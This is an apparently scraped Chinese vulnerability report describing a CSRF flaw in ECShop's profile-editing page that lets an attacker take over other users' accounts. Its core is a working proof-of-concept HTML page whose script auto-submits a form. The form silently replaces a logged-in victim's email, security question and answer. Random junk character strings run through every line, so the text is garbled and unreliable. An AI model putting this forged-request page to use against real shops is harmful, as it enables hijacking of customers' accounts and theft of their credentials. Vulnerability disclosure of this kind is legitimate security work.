简要描述:
& L. W! {" O: ^/ ]ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现 g8 t( O3 H; w' W; D, L, C
6 \$ V" ]3 T+ q& V4 g/ }Demo For:http://www.wooyun.org/bug.php?action=view&id=395
7 O) l1 m: x1 J2 ^5 U) F8 C. n: m* A7 q w2 `
详细说明:4 v- t" W% z. f0 c
利用csrf和xss可以突破官方所说的“障碍”8 } L& }: F. H) U
xss版本已经有人说明
9 G8 y+ i$ F8 y2 U' x0 Q5 L# z这里给出csrf版本
& E* \4 m4 R& N$ y8 M
/ {8 B1 \8 x, j漏洞证明:
1 N( Z" H3 g% E( R0 v3 P<html>
; z- G+ i+ f2 K! U& K<body>$ ^8 ~7 W# W0 W0 @
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">8 \4 S# O. a6 H9 s
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
, a& L; V, m; n" y# W: q8 h( D<INPUT TYPE="text" NAME="act" value="act_edit_profile">1 k1 h- _# q4 |
<INPUT TYPE="text" NAME="sel_question" value="ecshop">
$ b5 E1 c3 {0 z6 U" Y2 `<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
2 S9 U5 {% @% K6 C) E& V# S& q</body>% B+ N. v8 X$ A7 V( |/ R9 o
<script>
2 H$ r4 Q) \/ |/ I. ydocument.forms[0].submit();
5 A% u5 C& T. G" ]# b- @& v Y</script>
. g3 z& B6 ^$ _! l2 ^9 A</html>: B O6 l6 l$ {% r* P. Z
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失1 v/ g9 v% O1 Q( v7 [& ]
7 k) {0 D% x2 V2 l) Y
|